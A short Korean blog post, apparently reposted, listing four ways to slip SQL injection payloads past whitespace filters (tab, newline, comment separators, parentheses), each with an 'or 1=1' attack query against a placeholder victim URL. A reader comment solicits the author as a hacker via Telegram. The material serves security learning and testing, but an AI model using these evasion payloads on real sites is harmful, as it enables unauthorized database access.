애드센스


SQL Injection 공백 Filtering 우회

trim함수나 문자열 관력 함수로 공백(White Space)를 필터링하는 경우가 있다.
이와 같은 경우를 우회하는 방법으로는 다음 4가지가 있다.

Target URL: http://victim/rank.php?id=user01&point=1000

1. Tab(%09)
정상 Query: select * from ranking where id='user01' and point=1000;
공격 Query: select * from ranking where id='user01' and point=1[Tab]or[Tab]1=1;

2. NL(%0a)
정상 Query: select * from ranking where id='user01' and point=1000;
공격 Query: select * from ranking where id='user01' and point=1[new line]or[new line]1=1; 

3. 주석(/-*-)
정상 Query: select * from ranking where id='user01' and point=1000;
공격 Query: select * from ranking where id='user01' and point=1/-*-or/-*-1=1;

4. 괄호("(",")")
정상 Query: select * from ranking where id='user01' and point=1000;
공격 Query: select * from ranking where id='user01' and point=(1)or(1=1);

출처: http://ahnmo.pagez.kr/entry/SQL-Injection-%EA%B3%B5%EB%B0%B1-Filtering-%EC%9A%B0%ED%9A%8C
G
M
T
음성 기능은 200자로 제한됨

덧글

  • 부탁 2019/01/17 08:21 # 삭제 답글

    안녕하세요 실력좋은 해커분 같아서 댓글남겨요 이 댓글 보시면 텔레그램 dal119로 연락한번 부탁드려요
댓글 입력 영역


Facebook

통계 위젯 (화이트)

7994
486
626602

구글